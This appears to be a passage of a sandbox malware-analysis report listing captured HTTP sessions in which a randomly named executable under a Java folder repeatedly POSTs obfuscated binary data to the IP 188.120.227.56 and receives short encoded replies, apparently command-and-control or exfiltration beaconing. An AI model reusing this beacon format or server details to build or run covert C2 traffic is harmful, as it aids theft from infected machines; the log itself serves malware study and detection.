Dec 10, 2024 07:33:41.473587036 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:33:41.826200008 CET	2536	OUT	Data Raw: 55 50 5f 50 55 42 56 55 5c 58 5b 56 51 5f 56 5e 59 56 5e 49 56 5e 54 52 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UP_PUBVU\X[VQ_V^YV^IV^TR[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#+395-1*!2<44)4Z?]>X!%Y"13Z,+?$>",5'Z!.[)<
Dec 10, 2024 07:33:42.801074028 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:43.039408922 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49846	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:43.586122990 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:33:43.932591915 CET	2536	OUT	Data Raw: 50 5d 5f 56 55 40 53 50 5c 58 5b 56 51 59 56 54 59 5d 5e 40 56 5d 54 5f 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P]_VU@SP\X[VQYVTY]^@V]T_[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU Y(!6>)>%"^274:(Z((!#>> 1,,8('-,'Z!.[)$
Dec 10, 2024 07:33:44.913989067 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:45.154983044 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49850	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:45.397371054 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2532 Expect: 100-continue
Dec 10, 2024 07:33:45.745093107 CET	2532	OUT	Data Raw: 50 58 5f 54 50 44 56 56 5c 58 5b 56 51 5a 56 53 59 57 5e 44 56 59 54 5e 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: PX_TPDVV\X[VQZVSYW^DVYT^[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU +:Z5-!6&?4^!* Z<;6"7+^:8#D$-9X.5'Z!.[)<
Dec 10, 2024 07:33:46.871233940 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:46.964802027 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49853	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:46.021461010 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2116 Expect: 100-continue
Dec 10, 2024 07:33:46.370037079 CET	2116	OUT	Data Raw: 50 5b 5a 57 50 46 53 52 5c 58 5b 56 51 5c 56 53 59 5c 5e 42 56 5b 54 5d 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P[ZWPFSR\X[VQ\VSY\^BV[T][[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU _(3>6=.S*56]1?4 94+;._5%X"" :8$09;'Z!.[)0
Dec 10, 2024 07:33:47.272037983 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:47.507240057 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 26 0d 2b 08 0e 1c 36 12 39 1c 3b 10 28 53 24 1f 3c 09 3c 58 2d 07 26 39 3f 01 2b 39 3b 59 20 29 22 5d 28 5f 2f 11 3c 3f 2a 0b 3c 03 2b 46 0c 1b 21 13 36 2b 00 55 30 28 2a 51 39 3e 23 5b 3e 13 21 05 36 3f 2a 0e 33 5a 30 00 20 13 0e 0b 28 3a 3c 5a 31 3e 27 5d 3c 23 08 57 23 2b 23 56 03 1f 25 1d 3f 3c 25 0b 27 11 00 55 26 01 27 11 27 28 20 02 29 17 22 53 24 10 25 00 33 3b 24 55 2b 32 39 13 26 2f 24 5b 2b 03 00 51 27 23 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&+69;(S$<<X-&9?+9;Y )"](_/<?<+F!6+U0(Q9>#[>!6?3Z0 (:<Z1>']<#W#+#V%?<%'U&''( )"S$%3;$U+29&/$[+Q'##S U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49856	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:47.205559015 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:33:47.557734013 CET	2536	OUT	Data Raw: 50 5f 5f 55 55 43 56 53 5c 58 5b 56 51 58 56 55 59 53 5e 46 56 52 54 59 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P__UUCVS\X[VQXVUYS^FVRTY[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ?3&5->>S:%$#:$?].Y"* W7^-(#E'*8'Z!.[)
Dec 10, 2024 07:33:48.530957937 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:49.000729084 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49862	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:49.239847898 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:33:49.588998079 CET	2536	OUT	Data Raw: 50 5f 5a 54 55 44 56 56 5c 58 5b 56 51 52 56 57 59 57 5e 40 56 5c 54 58 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P_ZTUDVV\X[VQRVWYW^@V\TX[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU (3="X>T=6\179??]>5>7"+^9#@'X6,%'Z!.[)
Dec 10, 2024 07:33:50.578260899 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:50.811587095 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49868	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:51.070391893 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:51.417197943 CET	2536	OUT	Data Raw: 50 5b 5f 5e 55 4a 56 54 5c 58 5b 56 51 5b 56 54 59 56 5e 40 56 5b 54 58 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P[_^UJVT\X[VQ[VTYV^@V[TX[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#+&[5"R?&>X&Y 7:?(;*]5=9Y#!,.'A$.%'Z!.[),
Dec 10, 2024 07:33:52.401281118 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49874	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:52.631180048 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2116 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:52.979484081 CET	2116	OUT	Data Raw: 55 51 5f 53 50 46 56 50 5c 58 5b 56 51 5b 56 55 59 50 5e 41 56 5d 54 5d 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UQ_SPFVP\X[VQ[VUYP^AV]T][[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#(-5"S>%6247:8?_6% 9+B0>:.%'Z!.[),
Dec 10, 2024 07:33:53.970319986 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:54.207504034 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 25 1e 3f 25 20 1c 22 3c 00 0a 2d 3d 3c 55 24 31 2f 1c 28 3d 3d 06 26 04 2b 01 28 29 23 59 22 07 31 03 28 07 2b 13 2b 01 32 0b 3f 29 2b 46 0c 1b 21 5f 35 15 03 08 27 5d 2a 55 2e 2e 3c 01 3d 3e 3e 5b 23 3c 3d 55 25 3c 3b 5a 23 2e 27 1b 28 5f 2f 02 32 03 01 5c 2b 23 26 1e 20 11 23 56 03 1f 25 56 3f 3f 04 52 30 06 3e 1d 25 06 2b 59 30 38 33 58 2a 2a 32 54 30 3e 0f 06 27 01 2c 57 28 1f 0b 11 32 2c 27 02 2b 3e 2d 08 27 23 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%?% "<-=<U$1/(==&+()#Y"1(++2?)+F!_5']U..<=>>[#<=U%<;Z#.'(_/2\+#& #V%V??R0>%+Y083X2T0>',W(2,'+>-'##S U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49875	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:52.781709909 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:53.135732889 CET	2536	OUT	Data Raw: 50 5a 5f 57 55 40 56 54 5c 58 5b 56 51 58 56 55 59 54 5e 48 56 5b 54 5d 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: PZ_WU@VT\X[VQXVUYT^HV[T][[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU \<0.]5=9=5:X1Y3 <\+2^6-*#"3_,++3:,%'Z!.[)
Dec 10, 2024 07:33:54.115660906 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:54.786998987 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49882	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:55.034132004 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:33:55.385734081 CET	2536	OUT	Data Raw: 55 5b 5f 54 50 47 53 56 5c 58 5b 56 51 5b 56 54 59 56 5e 46 56 52 54 5f 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U[_TPGSV\X[VQ[VTYV^FVRT_[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU \+3_ >>T)S!1< <[<8"]"-9[ 1Y,8?0=5.%'Z!.[),
Dec 10, 2024 07:33:56.374428988 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:56.607628107 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49888	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:56.864265919 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:57.213799953 CET	2536	OUT	Data Raw: 55 5e 5f 56 55 41 53 52 5c 58 5b 56 51 5b 56 50 59 52 5e 42 56 5f 54 58 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U^_VUASR\X[VQ[VPYR^BV_TX[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU (#"Z6>.=X%##\(<(1">=^ 2+Y.<'%Y.%'Z!.[),
Dec 10, 2024 07:33:58.203742027 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:58.439492941 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49892	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:58.673877001 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:59.029409885 CET	2536	OUT	Data Raw: 50 5c 5f 5e 50 41 56 53 5c 58 5b 56 51 5f 56 54 59 5d 5e 42 56 5f 54 53 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P\_^PAVS\X[VQ_VTY]^BV_TS[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#<0-!-&%1Y,_#:<(;&Y!>7:7D0.)85'Z!.[)<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49895	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:59.334194899 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2116 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:59.682720900 CET	2116	OUT	Data Raw: 50 58 5f 57 50 41 56 55 5c 58 5b 56 51 5b 56 5f 59 56 5e 49 56 5c 54 5a 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: PX_WPAVU\X[VQ[V_YV^IV\TZ[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#<" -.R*=27#(+"![> (-]8$9];5'Z!.[),
Dec 10, 2024 07:34:00.667467117 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:00.903552055 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 26 0f 2b 18 34 56 20 2f 31 11 2f 3e 3c 56 27 0f 01 19 2b 3e 26 1c 26 3a 27 05 2b 17 23 10 22 29 26 5e 28 00 2f 5a 3c 3c 3e 0a 3c 39 2b 46 0c 1b 22 07 35 3b 35 0f 30 2b 2e 12 39 03 3f 1e 29 03 0c 5f 21 05 3d 1e 25 2c 33 5b 37 3e 23 52 3f 39 0d 01 32 2e 3f 10 2b 0d 0c 53 23 01 23 56 03 1f 25 1c 3f 11 0c 52 24 3f 2e 57 32 06 3f 10 33 38 30 02 3e 5f 32 54 24 10 3d 01 27 16 2b 0f 2b 21 21 12 25 2c 24 5a 2b 2d 25 09 30 23 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&+4V /1/><V'+>&&:'+#")&^(/Z<<><9+F"5;50+.9?)_!=%,3[7>#R?92.?+S##V%?R$?.W2?380>_2T$='++!!%,$Z+-%0##S* U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49897	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:59.461061001 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:59.807841063 CET	2536	OUT	Data Raw: 50 5f 5f 55 50 46 56 57 5c 58 5b 56 51 53 56 51 59 54 5e 43 56 5e 54 5b 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P__UPFVW\X[VQSVQYT^CV^T[[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ?"6X:=%2(^!) [?&]!.> 7.;8'!_.5'Z!.[)
Dec 10, 2024 07:34:00.800870895 CET	25	IN	HTTP/1.1 100 Continue
